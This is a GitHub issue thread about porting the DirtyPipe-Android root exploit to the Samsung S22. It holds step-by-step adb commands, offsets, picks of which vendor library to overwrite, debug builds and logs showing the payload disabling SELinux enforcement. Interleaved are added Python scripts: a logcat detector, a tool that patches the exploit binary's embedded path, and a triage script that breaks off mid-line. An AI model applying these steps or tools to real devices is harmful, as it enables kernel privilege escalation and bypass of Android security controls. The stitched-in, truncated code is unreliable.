polygraphene/DirtyPipe-Android

S22

oakieville opened this issue · 158 comments

Could this same method work on the S22? I assume it would require mymod.ko to be built from the S22 kernel source, but can it work?

Basically it should work by a similar procedure.
It needs some modifications like:

  1. Fix function offset of libc++.so
  2. Choose proper library file to overwrite
  3. Build mymod.ko for s22 kernel source

If there is a dev interested in that, I can help them.

I'm interested in trying it. I have the S22 kernel source as well as the firmware to extract libc++ from; however, I would need a good deal of guidance on this.

If we could chat on Telegram or WhatsApp, that would be great.

If possible, please contact me: oakieville209@gmail.com

s22 libc++.so

000403e1 w DF .text 00000030 Base std::__1::basic_streambuf<char, std::__1::char_traits<char> >::basic_streambuf()

Our schedules might not match for chat.

I added auto-detection of the offset for libc++.so, so the remaining issues are the kernel module and libstagefright_soft_mp3dec.so.
The kernel module may run on other devices without modification. Try it to check if it works.

The target vendor lib (on Pixel 6, libstagefright_soft_mp3dec.so) must have byte 0x57 at offset 0x1000, like the following:

$ xxd libstagefright_soft_mp3dec.so|grep 01000:
00001000: 5f61 6561 6269 5f6d 656d 6370 7900 5f5f  _aeabi_memcpy.__

If you can get the firmware image for the device, extract vendor.img on a PC and find the proper lib with the following command:

$ for i in vendor/lib/*.so; do echo $i; xxd $i | grep "001000: 5f" ; done
(snip)
vendor/lib/libstagefright_soft_hevcdec.so
vendor/lib/libstagefright_soft_mp3dec.so
00001000: 5f61 6561 6269 5f6d 656d 6370 7900 5f5f  _aeabi_memcpy.__
vendor/lib/libstagefright_soft_mpeg2dec.so
vendor/lib/libstagefright_soft_mpeg4dec.so
(snip)

If you can't find a proper lib, we should find other methods.

After finding the lib:

adb shell /data/local/tmp/dirtypipe-android -f (Found lib path)

You can also use /vendor/lib64/*.so, but a 32-bit lib should have a smaller impact on the system.

If you succeed, adb logcat looks like this:

03-27 15:30:08.230     1     1 W /system/bin/init: type=1107 audit(0.0:27746): uid=0 auid=4294967295 ses=4294967295 subj=u:r:init:s0 msg='avc: denied { set } for property=a pid=12648 uid=2000 gid=2000 scontext=u:r:shell:s0 tcontext=u:object_r:default_prop:s0 tclass=property_service permissive=0'
03-27 15:30:08.240 12648 12648 W libc    : Unable to set property "a" to "a": error code: 0x18
01-01 09:00:00.1023 12649 12649 I stage2  : pipe_size: 65536
01-01 09:00:00.1023 12649 12649 I stage2  : Wait for child pid=12653
03-27 15:30:08.290 12653 12653 I modprobe: type=1400 audit(0.0:27747): avc: denied { read } for path="/dev/.dirtypipe-0057" dev="tmpfs" ino=1223 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:device:s0 tclass=file permissive=1
03-27 15:30:08.290 12653 12653 I modprobe: type=1400 audit(0.0:27748): avc: denied { read } for path="pipe:[599140]" dev="pipefs" ino=599140 scontext=u:r:vendor_modprobe:s0 tcontext=u:r:init:s0 tclass=fifo_file permissive=1
03-27 15:30:08.290 12653 12653 I modprobe: type=1400 audit(0.0:27749): avc: denied { write } for path="pipe:[599140]" dev="pipefs" ino=599140 scontext=u:r:vendor_modprobe:s0 tcontext=u:r:init:s0 tclass=fifo_file permissive=1
03-27 15:30:08.343 12653 12653 I modprobe-payload: Successfully set permissive: /vendor/lib/libstagefright_soft_mp3dec.so -1 42
03-27 15:30:08.338 12654 12654 I modprobe: type=1400 audit(0.0:27750): avc: denied { search } for name="tmp" dev="dm-56" ino=94 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=dir permissive=1
03-27 15:30:08.338 12654 12654 I modprobe: type=1400 audit(0.0:27751): avc: denied { execute } for name="startup-root" dev="dm-56" ino=101332 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=file permissive=1
03-27 15:30:08.338 12654 12654 I modprobe: type=1400 audit(0.0:27752): avc: denied { read open } for path="/data/local/tmp/startup-root" dev="dm-56" ino=101332 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=file permissive=1
01-01 09:00:00.1023 12649 12649 I stage2  : waitid returned with 0. Restore files.
03-27 15:30:09.554 12658 12658 I rm      : type=1400 audit(0.0:28232): avc: denied { search } for name="tmp" dev="dm-56" ino=94 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=dir permissive=1
03-27 15:30:09.554 12658 12658 I rm      : type=1400 audit(0.0:28233): avc: denied { getattr } for path="/data/local/tmp/reverse-fifo" dev="dm-56" ino=107557 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=fifo_file permissive=1
03-27 15:30:09.554 12658 12658 I rm      : type=1400 audit(0.0:28234): avc: denied { dac_override } for capability=1 scontext=u:r:vendor_modprobe:s0 tcontext=u:r:vendor_modprobe:s0 tclass=capability permissive=1
03-27 15:30:09.554 12658 12658 I rm      : type=1400 audit(0.0:28235): avc: denied { write } for name="tmp" dev="dm-56" ino=94 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=dir permissive=1
03-27 15:30:09.554 12658 12658 I rm      : type=1400 audit(0.0:28236): avc: denied { remove_name } for name="reverse-fifo" dev="dm-56" ino=107557 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=dir permissive=1
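As an added example (not part of the repo or this thread), here is a small Python detector for the kind of logcat output shown above. It runs over a constructed sample abbreviated from that excerpt and flags what a defender would look for: AVC records from u:r:vendor_modprobe:s0 with permissive=1, accesses to .dirtypipe-* staging files, and the payload's own "Successfully set permissive" message.

```python
import re

# Constructed sample: a handful of lines abbreviated from the logcat excerpt in
# the thread above (pids, inode numbers and timestamps as posted there).
SAMPLE_LOGCAT = """\
03-27 15:30:08.230     1     1 W /system/bin/init: type=1107 audit(0.0:27746): uid=0 auid=4294967295 ses=4294967295 subj=u:r:init:s0 msg='avc: denied { set } for property=a pid=12648 uid=2000 gid=2000 scontext=u:r:shell:s0 tcontext=u:object_r:default_prop:s0 tclass=property_service permissive=0'
03-27 15:30:08.290 12653 12653 I modprobe: type=1400 audit(0.0:27747): avc: denied { read } for path="/dev/.dirtypipe-0057" dev="tmpfs" ino=1223 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:device:s0 tclass=file permissive=1
03-27 15:30:08.290 12653 12653 I modprobe: type=1400 audit(0.0:27748): avc: denied { read } for path="pipe:[599140]" dev="pipefs" ino=599140 scontext=u:r:vendor_modprobe:s0 tcontext=u:r:init:s0 tclass=fifo_file permissive=1
03-27 15:30:08.343 12653 12653 I modprobe-payload: Successfully set permissive: /vendor/lib/libstagefright_soft_mp3dec.so -1 42
03-27 15:30:08.338 12654 12654 I modprobe: type=1400 audit(0.0:27751): avc: denied { execute } for name="startup-root" dev="dm-56" ino=101332 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:shell_data_file:s0 tclass=file permissive=1
"""

# Fields of a kernel AVC record as it appears inside a logcat line.
AVC_RE = re.compile(
    r'avc: denied \{ (?P<perms>[^}]*)\} for (?P<detail>.*?)'
    r'scontext=(?P<scontext>\S+) tcontext=(?P<tcontext>\S+) '
    r'tclass=(?P<tclass>\S+) permissive=(?P<permissive>[01])'
)
# Log tag sits between the priority letter and the colon: "12653 12653 I modprobe: ..."
TAG_RE = re.compile(r'\s[VDIWEF]\s+(\S+?)\s*:')

# The domain init spawns modprobe in; on a production build it is enforcing,
# so permissive=1 in an AVC record from it means the policy was changed at runtime.
SUSPECT_DOMAIN = "u:r:vendor_modprobe:s0"
PAYLOAD_TAG = "modprobe-payload"


def parse_avc(line):
    """Return the AVC fields of a logcat line as a dict, or None if it has no AVC record."""
    m = AVC_RE.search(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["perms"] = rec["perms"].split()          # "read open " -> ["read", "open"]
    rec["permissive"] = rec["permissive"] == "1"
    tag = TAG_RE.search(line)
    rec["tag"] = tag.group(1) if tag else ""
    return rec


def scan_logcat(text):
    """Return a list of (line_no, reason) findings for DirtyPipe-Android style activity."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        # The payload announces itself; an exact-string match is the cheapest signal.
        if PAYLOAD_TAG in line and "Successfully set permissive" in line:
            findings.append((n, "payload reported switching a domain to permissive"))
            continue
        rec = parse_avc(line)
        if rec is None:
            continue
        # A denial that was nevertheless allowed (permissive=1) from a domain that
        # should be enforcing is the core indicator; ordinary shell denials
        # (permissive=0, as on the first sample line) are not.
        if rec["scontext"] == SUSPECT_DOMAIN and rec["permissive"]:
            findings.append((n, f"{SUSPECT_DOMAIN} is permissive "
                                f"(denied {{ {' '.join(rec['perms'])} }} on "
                                f"{rec['tclass']} was allowed)"))
        # The exploit stages its payload under a /dev/.dirtypipe-* name.
        if ".dirtypipe-" in rec["detail"]:
            findings.append((n, "access to a .dirtypipe-* staging file"))
    return findings


if __name__ == "__main__":
    for line_no, reason in scan_logcat(SAMPLE_LOGCAT):
        print(f"line {line_no}: {reason}")
```

On a real device feed the output of `adb logcat -d` to scan_logcat; the permissive=1 check is the part worth keeping even if the staging file name changes.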

Not sure if it matters, but you can run those commands from the shell on the device itself. If you run:

xxd libstagefright_soft_mp3dec.so|grep 01000
00001000: 695f 6d65 6d63 7079 3400 5f5f 6165 6162  i_memcpy4.__aeab
00010000: 1400 5ae3 f2fa ffda 1500 5ae3 f7fa ff1a  ..Z.......Z.....

and furthermore the other command returns a long list, which I will provide shortly. Are we looking for something that contains exactly this:

00001000: 5f61 6561 6269 5f6d 656d 6370 7900 5f5f _aeabi_memcpy.__

Hey elliwigy, how are you doing? OK, I will check as you instructed above. I do see that libstagefright_soft_mp3dec.so doesn't seem to exist on the S22, though there are other libstagefright libs there. I have not yet checked the offset; I will do so later today or tomorrow.

These are all the ones it finds:

for i in vendor/lib/*.so; do echo $i; xxd $i | grep "001000: 5f" ; done
vendor/lib/uwb_uci.helios.so
vendor/lib/vendor.display.color@1.0.so
vendor/lib/vendor.display.color@1.1.so
vendor/lib/vendor.display.color@1.2.so
vendor/lib/vendor.display.color@1.3.so
vendor/lib/vendor.display.color@1.4.so
vendor/lib/vendor.display.color@1.5.so
vendor/lib/vendor.display.color@1.6.so
vendor/lib/vendor.display.color@1.7.so
vendor/lib/vendor.display.config@1.0.so
vendor/lib/vendor.display.config@1.1.so
vendor/lib/vendor.display.config@1.10.so
vendor/lib/vendor.display.config@1.11.so
vendor/lib/vendor.display.config@1.2.so
vendor/lib/vendor.display.config@1.3.so
vendor/lib/vendor.display.config@1.4.so
vendor/lib/vendor.display.config@1.5.so
vendor/lib/vendor.display.config@1.6.so
vendor/lib/vendor.display.config@1.7.so
vendor/lib/vendor.display.config@1.8.so
vendor/lib/vendor.display.config@1.9.so
vendor/lib/vendor.display.config@2.0.so
vendor/lib/vendor.display.postproc@1.0.so
vendor/lib/vendor.qti.data.factory@2.0.so
vendor/lib/vendor.qti.data.factory@2.1.so
vendor/lib/vendor.qti.data.factory@2.2.so
vendor/lib/vendor.qti.data.factory@2.3.so
vendor/lib/vendor.qti.data.factory@2.4.so
vendor/lib/vendor.qti.data.mwqem@1.0.so
vendor/lib/vendor.qti.data.slm@1.0.so
vendor/lib/vendor.qti.diaghal@1.0.so
vendor/lib/vendor.qti.esepowermanager@1.0.so
vendor/lib/vendor.qti.esepowermanager@1.1.so
vendor/lib/vendor.qti.gnss-V1-ndk_platform.so
vendor/lib/vendor.qti.gnss-service.so
vendor/lib/vendor.qti.hardware.AGMIPC@1.0-impl.so
vendor/lib/vendor.qti.hardware.AGMIPC@1.0.so
vendor/lib/vendor.qti.hardware.ListenSoundModel@1.0-impl.so
vendor/lib/vendor.qti.hardware.ListenSoundModel@1.0.so
vendor/lib/vendor.qti.hardware.automotive.vehicle@1.0.so
vendor/lib/vendor.qti.hardware.bluetooth_audio@2.0.so
vendor/lib/vendor.qti.hardware.bluetooth_audio@2.1.so
vendor/lib/vendor.qti.hardware.cacert@1.0.so
vendor/lib/vendor.qti.hardware.camera.aon@1.0-service-impl.so
vendor/lib/vendor.qti.hardware.camera.aon@1.0.so
vendor/lib/vendor.qti.hardware.camera.device@1.0.so
vendor/lib/vendor.qti.hardware.camera.postproc@1.0-service-impl.so
vendor/lib/vendor.qti.hardware.camera.postproc@1.0.so
vendor/lib/vendor.qti.hardware.capabilityconfigstore@1.0.so
vendor/lib/vendor.qti.hardware.data.cne.internal.api@1.0.so
vendor/lib/vendor.qti.hardware.data.cne.internal.constants@1.0.so
vendor/lib/vendor.qti.hardware.data.cne.internal.server@1.0.so
vendor/lib/vendor.qti.hardware.data.cne.internal.server@1.1.so
vendor/lib/vendor.qti.hardware.data.connection@1.0.so
vendor/lib/vendor.qti.hardware.data.connection@1.1.so
vendor/lib/vendor.qti.hardware.data.dynamicdds@1.0.so
vendor/lib/vendor.qti.hardware.data.dynamicdds@1.1.so
vendor/lib/vendor.qti.hardware.data.flow@1.0.so
vendor/lib/vendor.qti.hardware.data.latency@1.0.so
vendor/lib/vendor.qti.hardware.data.lce@1.0.so
vendor/lib/vendor.qti.hardware.data.qmi@1.0.so
vendor/lib/vendor.qti.hardware.display.allocator@1.0.so
vendor/lib/vendor.qti.hardware.display.allocator@3.0.so
vendor/lib/vendor.qti.hardware.display.allocator@4.0.so
vendor/lib/vendor.qti.hardware.display.composer@1.0.so
vendor/lib/vendor.qti.hardware.display.composer@2.0.so
vendor/lib/vendor.qti.hardware.display.config-V1-ndk_platform.so
vendor/lib/vendor.qti.hardware.display.config-V2-ndk_platform.so
vendor/lib/vendor.qti.hardware.display.config-V3-ndk_platform.so
vendor/lib/vendor.qti.hardware.display.config-V4-ndk_platform.so
vendor/lib/vendor.qti.hardware.display.config-V5-ndk_platform.so
vendor/lib/vendor.qti.hardware.display.demura@2.0.so
vendor/lib/vendor.qti.hardware.display.mapper@1.0.so
vendor/lib/vendor.qti.hardware.display.mapper@1.1.so
vendor/lib/vendor.qti.hardware.display.mapper@2.0.so
vendor/lib/vendor.qti.hardware.display.mapper@3.0.so
vendor/lib/vendor.qti.hardware.display.mapper@4.0.so
vendor/lib/vendor.qti.hardware.display.mapperextensions@1.0.so
vendor/lib/vendor.qti.hardware.display.mapperextensions@1.1.so
vendor/lib/vendor.qti.hardware.display.mapperextensions@1.2.so
vendor/lib/vendor.qti.hardware.dsp@1.0.so
vendor/lib/vendor.qti.hardware.eid@1.0.so
vendor/lib/vendor.qti.hardware.fingerprint@1.0.so
vendor/lib/vendor.qti.hardware.iop@1.0.so
vendor/lib/vendor.qti.hardware.iop@2.0.so
vendor/lib/vendor.qti.hardware.mwqemadapter@1.0.so
vendor/lib/vendor.qti.hardware.pal@1.0.so
vendor/lib/vendor.qti.hardware.perf@2.0.so
vendor/lib/vendor.qti.hardware.perf@2.1.so
vendor/lib/vendor.qti.hardware.perf@2.2.so
vendor/lib/vendor.qti.hardware.perf@2.3.so
vendor/lib/vendor.qti.hardware.qccsyshal@1.0.so
vendor/lib/vendor.qti.hardware.qccsyshal@1.1.so
vendor/lib/vendor.qti.hardware.qccvndhal@1.0.so
vendor/lib/vendor.qti.hardware.qdutils_disp@1.0.so
vendor/lib/vendor.qti.hardware.qseecom@1.0.so
vendor/lib/vendor.qti.hardware.qteeconnector@1.0.so
vendor/lib/vendor.qti.hardware.servicetracker@1.0.so
vendor/lib/vendor.qti.hardware.servicetracker@1.1.so
vendor/lib/vendor.qti.hardware.servicetracker@1.2.so
vendor/lib/vendor.qti.hardware.slmadapter@1.0.so
vendor/lib/vendor.qti.hardware.soter@1.0.so
vendor/lib/vendor.qti.hardware.systemhelper@1.0.so
vendor/lib/vendor.qti.hardware.trustedui@1.0.so
vendor/lib/vendor.qti.hardware.trustedui@1.1.so
vendor/lib/vendor.qti.hardware.trustedui@1.2.so
vendor/lib/vendor.qti.hardware.tui_comm@1.0.so
vendor/lib/vendor.qti.hardware.vpp@1.1.so
vendor/lib/vendor.qti.hardware.vpp@1.2.so
vendor/lib/vendor.qti.hardware.vpp@1.3.so
vendor/lib/vendor.qti.hardware.vpp@2.0.so
vendor/lib/vendor.qti.ims.callcapability@1.0.so
vendor/lib/vendor.qti.ims.callinfo@1.0.so
vendor/lib/vendor.qti.ims.rcsconfig@1.0.so
vendor/lib/vendor.qti.ims.rcsconfig@1.1.so
vendor/lib/vendor.qti.ims.rcsconfig@2.0.so
vendor/lib/vendor.qti.ims.rcsconfig@2.1.so
vendor/lib/vendor.qti.latency@2.0.so
vendor/lib/vendor.qti.latency@2.1.so
vendor/lib/vendor.qti.memory.pasrmanager@1.0.so
vendor/lib/vendor.qti.memory.pasrmanager@1.1.so
vendor/lib/vendor.qti.power.pasrmanager@1.0.so
vendor/lib/vendor.qti.qspmhal@1.0.so
vendor/lib/vendor.qti.spu@1.0.so
vendor/lib/vendor.qti.spu@1.1.so
vendor/lib/vendor.qti.spu@2.0.so
vendor/lib/vendor.qti.voiceprint@1.0.so
vendor/lib/vendor.samsung.hardware.audio@1.0.so
vendor/lib/vendor.samsung.hardware.biometrics.face@2.0.so
vendor/lib/vendor.samsung.hardware.bluetooth.a2dp@1.0.so
vendor/lib/vendor.samsung.hardware.bluetooth.a2dpsink@1.0.so
vendor/lib/vendor.samsung.hardware.bluetooth.audio@2.0.so
vendor/lib/vendor.samsung.hardware.camera.device@5.0-impl.so
vendor/lib/vendor.samsung.hardware.camera.device@5.0.so
vendor/lib/vendor.samsung.hardware.camera.provider@4.0-legacy.so
vendor/lib/vendor.samsung.hardware.camera.provider@4.0.so
vendor/lib/vendor.samsung.hardware.health@2.0.so
vendor/lib/vendor.samsung.hardware.hqm@1.0.so
vendor/lib/vendor.samsung.hardware.hyper-V2-ndk_platform.so
vendor/lib/vendor.samsung.hardware.security.hdcp.wifidisplay-V2-ndk_platform.so
vendor/lib/vendor.samsung.hardware.snap@1.0.so
vendor/lib/vendor.samsung.hardware.snap@1.1.so
vendor/lib/vendor.samsung.hardware.snap@1.2.so
vendor/lib/vendor.samsung.hardware.thermal@1.0.so
vendor/lib/vendor.samsung.hardware.tlc.blockchain@1.0-impl.so
vendor/lib/vendor.samsung.hardware.tlc.blockchain@1.0.so
vendor/lib/vendor.samsung.hardware.tlc.hdm@1.0.so
vendor/lib/vendor.samsung.hardware.tlc.hdm@1.1-impl.so
vendor/lib/vendor.samsung.hardware.tlc.hdm@1.1.so
vendor/lib/vendor.samsung.hardware.tlc.payment@1.0-impl.so
vendor/lib/vendor.samsung.hardware.tlc.payment@1.0.so
vendor/lib/vendor.samsung.hardware.tlc.ucm@2.0-impl.so
vendor/lib/vendor.samsung.hardware.tlc.ucm@2.0.so
vendor/lib/vendor.samsung.hardware.uwb@1.0.so
vendor/lib/vintf-codecsolution-V2-ndk_platform.so

Hey elliwigy, how are you doing? OK, I will check as you instructed above. I do see that libstagefright_soft_mp3dec.so doesn't seem to exist on the S22; there are other libstagefright libs there, though. I have not yet checked the offset; I will do so later today or tomorrow.

It does exist on the S22 Ultra (SM-S908U), which is what I posted above, in /vendor/lib. Not sure why the S22 would be any different?

You cannot run the command on the device. You must extract the firmware image on a Linux PC, e.g. Ubuntu.

According to your output, we can choose a lib to overwrite.
The following libraries are the best candidates because they are not used so frequently (I think).

vendor/lib/libcamxifestriping.so
00001000: 5f68 616e 646c 655f 6e75 6c6c 6162 696c  _handle_nullabil
vendor/lib/libimage_enhancement.arcsoft.so
00001000: 5f6d 7574 6578 5f64 6573 7472 6f79 0070  _mutex_destroy.p

Download 1.0.2 from the release page, then edit run.bat to append arguments like:

%adb% shell %dir%/dirtypipe-android -f /vendor/lib/libcamxifestriping.so

Then launch run.bat and check adb logcat.

I will try this tonight and report back with logcat.

Just out of curiosity, why do you say you cannot run it on the device when the output I provided is from the device? lol

In a normal adb shell, running as the normal shell user, you cannot view vendor/lib (you get permission denied), but if you run as "vendor_shell" you can view the vendor/lib files just fine and can run the commands you posted earlier, as I did when sharing the output.

You can try it yourself. From a regular terminal you simply type:

adb shell /vendor/bin/sh

Then type:

id

and your output should show you are running as vendor_shell, where you can then view the vendor/lib directory with no problem and without having to download the firmware, unsparse super.img, lpunpack super.img and mount vendor, which is a lot more work and space used lol. Just saying :-)

run.bat
dirtypipe-android: 1 file pushed, 0 skipped. 2.7 MB/s (44688 bytes in 0.016s)
startup-root: 1 file pushed, 0 skipped. 0.1 MB/s (3671 bytes in 0.028s)
magisk/busybox: 1 file pushed, 0 skipped. 66.9 MB/s (2102536 bytes in 0.030s)
magisk/magiskpolicy: 1 file pushed, 0 skipped. 111.1 MB/s (672928 bytes in 0.006s)
4 files pushed, 0 skipped. 0.7 MB/s (2823823 bytes in 3.877s)
Ignore device info.
Device version: Product=qssi Fingerprint=samsung/r0qsqw/r0q:12/SP1A.210812.016/S901USQU1AVC8:user/release-keys
Stage2 libname for kmod overwrite: /vendor/lib/libcamxifestriping.so
Offset found: shellcode_offset: a57d0 hook_offset: 5b260
Empty space size: 2096 bytes
Run index: 0
Shell code size: 308 0x134 bytes
open failed: No such file or directory

logcat is here

http://oakieville.com/logcat.txt

Seems it can't access vendor/lib/* files.

The reason I believe it says the file is not found is because the file "/system/lib/libldacBT_enc.so" does not exist on the Samsungs.

My workaround was (instead of compiling):
I opened the release file "dirtypipe-android" in HxD and changed both places that contained "/system/lib/libldacBT_enc.so" to "/////system/lib/random.so" (the first "/" and the ".so" have to line up, but you can have as many leading "/" as you need to null out extra letters in the path name).
The periods before and after the path name are hex "00" and not actually periods.

It'll run but crashes my device almost immediately. It does work, though, as I can use it to copy normally unreadable files to the sdcard.
I believe it is either Knox or the module needs to be tailored to Samsung's kernel.
I would attach the log but it crashes without any log output on adb.
Also, the libs between the S908U and S908U1 are different. Only two of the possibilities were the same for me.
I used several vendor libs but mostly picked this one, /vendor/lib/libcamxifestriping.so, due to it being the same across both models.

I can use the vendor shell to look at the modules in vendor_dlkm/lib/modules (I think?). I did see a file called something like "policy config.ko" but it doesn't look like it lines up with the "mymod.ko". That may be irrelevant, though.
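The hex-editor workaround above (swapping the hard-coded "/system/lib/libldacBT_enc.so" for another path in the release binary) can be done mechanically, with the one check that matters done for you: the replacement must fit in the bytes the old string occupies, and the unused tail is NUL-filled so the C string still terminates where it did. The following is an added example, not code from DirtyPipe-Android; it assumes the binary uses the path as a plain NUL-terminated C string (a length-prefixed use would also need the length fixed), and the input blob is constructed test data. It also shows why the obvious "/system/lib64/libldacBT_enc.so" cannot be patched in this way: it is two bytes longer than the original.

```python
#!/usr/bin/env python3
"""Replace an embedded NUL-terminated path inside a prebuilt binary.

Added example, not part of DirtyPipe-Android. Automates the hex-editor
workaround from the thread: every NUL-terminated occurrence of the old path
is replaced by the new one, NUL-padded to the same length. Leading extra '/'
characters, as in the post, also work because the kernel collapses repeated
slashes, but NUL padding keeps the path readable in `strings` output.
The blob returned by constructed_binary() is made-up test data.
"""

OLD_PATH = b"/system/lib/libldacBT_enc.so"          # 28 bytes, as shipped in the release


def fits(old, new):
    """True when `new` can replace `old` in place (same or shorter length)."""
    return len(new) <= len(old)


def patch_cstring(blob, old, new):
    """Return (patched_bytes, count).

    Every `old` that is followed by a NUL is replaced by `new` plus NUL
    padding, so the total size and every other file offset are unchanged.
    Raises ValueError if `new` is too long or `old` is not found.
    """
    if not fits(old, new):
        raise ValueError(f"new path ({len(new)} bytes) is longer than old ({len(old)})")
    needle = old + b"\0"
    replacement = new + b"\0" * (len(old) - len(new) + 1)   # same length as needle
    count = blob.count(needle)
    if count == 0:
        raise ValueError("old path not found as a NUL-terminated string")
    return blob.replace(needle, replacement), count


def find_cstrings(blob, prefix):
    """All NUL-terminated strings in blob that start with `prefix`.

    Useful before and after patching to confirm what the binary hard-codes.
    """
    out, start = [], 0
    while True:
        i = blob.find(prefix, start)
        if i < 0:
            return out
        end = blob.find(b"\0", i)
        if end < 0:
            end = len(blob)
        out.append(blob[i:end].decode("ascii", "replace"))
        start = end + 1


def constructed_binary():
    """Constructed stand-in for the release binary: the post says the path
    appears in two places, so two copies sit among other bytes."""
    return (b"\x7fELF" + b"\0" * 12
            + OLD_PATH + b"\0" + b"rw\0" + b"\0" * 8
            + OLD_PATH + b"\0" + b"done\0")


if __name__ == "__main__":
    blob = constructed_binary()
    print("before:", find_cstrings(blob, b"/system/lib"))
    patched, n = patch_cstring(blob, OLD_PATH, b"/system/lib/random.so")
    print(f"patched {n} occurrence(s):", find_cstrings(patched, b"/system/lib"))
    print("lib64 path fits in place:", fits(OLD_PATH, b"/system/lib64/libldacBT_enc.so"))
```

Run it against the real file with `patch_cstring(open("dirtypipe-android", "rb").read(), OLD_PATH, b"/system/lib/random.so")` and write the result back; on 1.0.3 the stage2_lib path is printed by the tool itself and no patching is needed.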

/system/lib/libldacBT_enc.so isn't what it was calling. If you look at the code, it prints "Stage2 libname for kmod overwrite: /vendor/lib/libcamxifestriping.so" from the same variable it loads the lib from. I believe, as elliwigy explained, it requires being /vendor/bin/sh to access those libs correctly.

lib/libextmediaformatdef.so
00001000: 5f63 726f 7000 6369 7479 2d69 6400 7472 _crop.city-id.tr

Maybe this?

The program writes to /system/lib/libldacBT_enc.so and then uses that to write to the vendor files.

The payload in libc++ mmaps libldacBT_enc.so for the stage2 payload, which is located at /system/lib/libldacBT_enc.so, which the S22 Ultra doesn't have.

Edit the file and try it; it'll say it worked but reboots. You can edit startup-root and have it copy files to the sdcard that you can't normally access.

S22 Ultra does have it:

/system/lib64/libldacBT_enc.so

Of course, it's in the lib64 dir, not lib.

So maybe edit it to use the same .so file but in lib64.

That's absolutely right. My bad.
It was unnecessary to extract the firmware. Thanks!

There doesn't seem to be a "/system/lib/libldacBT_enc.so", as @Dog10dogg said.
Actually "libldacBT_enc.so" can be any file which is not used so frequently by the system.
You can choose the 64-bit "/system/lib64/libldacBT_enc.so". I will add an option to change this lib.

stage2_lib (/system/lib/libldacBT_enc.so) and stage2_param_libname (/vendor/lib/libstagefright_soft_mp3dec.so on Pixel 6) are confusing names, but they have different roles.
dirtypipe-android (the shell process) overwrites stage2_lib to send code to be executed in the init process.
Then the init process overwrites stage2_param_libname so that it has the content of mymod.ko.

I would attach the log but it crashes without any log output on adb.

So we should investigate what is causing this crash.
I will upload a debug version later.

Also, if I change that to a lib in system/lib in the command, it doesn't say file not found, or at least it didn't when I tried it.

dirtypipe-android-1.0.3-debug1.zip

Try this version.
This version should output logcat like the following if stage1 has run successfully:

$ adb shell
oriole:/ $ logcat | grep libc
03-29 21:47:19.811 24886   375 F libc    : Fatal signal 7 (SIGBUS), code 1 (BUS_ADRALN), fault addr 0x7fad3d4001 in tid 24886 (init), pid 24886 (init)

In addition to logcat, paste output of run.bat here.

If it still reboots, there is something wrong in stage1.

Even if the device doesn't reboot, please manually reboot after launching run.bat, because it won't automatically restore the file content. A reboot is required to restore the original files.

dirtypipe-android-1.0.3-debug2.zip

Try the second version if you got "libc : Fatal signal ..." in logcat.
It will generate an empty file at /dev/.s2a if stage2 was successfully called.

Run adb shell ls /dev/.s2a to check if the file exists.
When the file exists, it says "Permission denied":

$ adb shell ls /dev/.s2a
ls: /dev/.s2a: Permission denied

When it does not exist (failed to call stage2), it says "No such file or directory" (or reboots):

$ adb shell ls /dev/.s2a
ls: /dev/.s2a: No such file or directory

dirtypipe-android-1.0.3-debug3.zip
Try the third version if you got "Permission denied".

It will produce the following logcat if modprobe was successfully launched:

$ adb shell
oriole:/ $ logcat | grep modprobe
03-29 22:25:08.312  3278  3278 W modprobe: type=1400 audit(0.0:76): avc: denied { read } for path="/dev/.dirtypipe-0005" dev="tmpfs" ino=1166 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:device:s0 tclass=file permissive=0
03-29 22:25:08.312  3278  3278 W modprobe: type=1400 audit(0.0:77): avc: denied { read } for path="pipe:[63464]" dev="pipefs" ino=63464 scontext=u:r:vendor_modprobe:s0 tcontext=u:r:init:s0 tclass=fifo_file permissive=0
03-29 22:25:08.312  3278  3278 W modprobe: type=1400 audit(0.0:78): avc: denied { write } for path="pipe:[63464]" dev="pipefs" ino=63464 scontext=u:r:vendor_modprobe:s0 tcontext=u:r:init:s0 tclass=fifo_file permissive=0
03-29 22:25:08.331  3278  3278 I modprobe-payload: Parsed lib_mod: /vendor/lib/libstagefright_soft_mp3dec.so
03-29 22:25:08.331  3278  3278 I modprobe-payload: Content: 5f 24 03 d5 a8 88 84 d2

If it failed, it might reboot or not output any log.

dirtypipe-android-1.0.3-beta.zip

Try this version if you succeeded in running debug1-3.
If this version still reboots the device, there is something wrong in the kernel module.
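The debug1/debug2/debug3/beta sequence above gives one logcat marker per stage. The following added example (not part of DirtyPipe-Android) turns those markers into a small triage function that can be run over a logcat saved with `adb logcat -d > logcat.txt`, so the furthest stage reached is reported instead of having to scroll for it. The mapping of markers to stages is this example's reading of the maintainer's posts: the `libc : Fatal signal 7 (SIGBUS)` line in init means stage1 ran, `modprobe-payload: Parsed lib_mod` means modprobe was launched, and `modprobe-payload: Successfully set permissive` (which shows up in a later post in this thread) means the kernel module ran. `avc: denied` lines for `u:r:vendor_modprobe:s0` are collected as well, since their `permissive=` flag tells whether the module managed to switch the domain to permissive. The sample log lines are copied from the posts in this issue.

```python
#!/usr/bin/env python3
"""Classify a saved logcat from a DirtyPipe-Android debug run.

Added example, not part of the DirtyPipe-Android project. The regexes
encode the success indicators the maintainer lists for the 1.0.3 debug
builds; the sample logs are lines copied from this thread.
"""
import re

MARKERS = [
    # (stage name, regex) in execution order; the last matching stage is the furthest reached
    ("stage1_ran", re.compile(r"F libc\s*: Fatal signal 7 \(SIGBUS\).*\(init\)")),
    ("modprobe_launched", re.compile(r"modprobe-payload: Parsed lib_mod: (\S+)")),
    ("kmod_loaded", re.compile(r"modprobe-payload: Successfully set permissive")),
]

# SELinux denials raised by the modprobe payload; permissive=1 means it already
# switched its domain to permissive (the denial is logged but not enforced).
AVC = re.compile(
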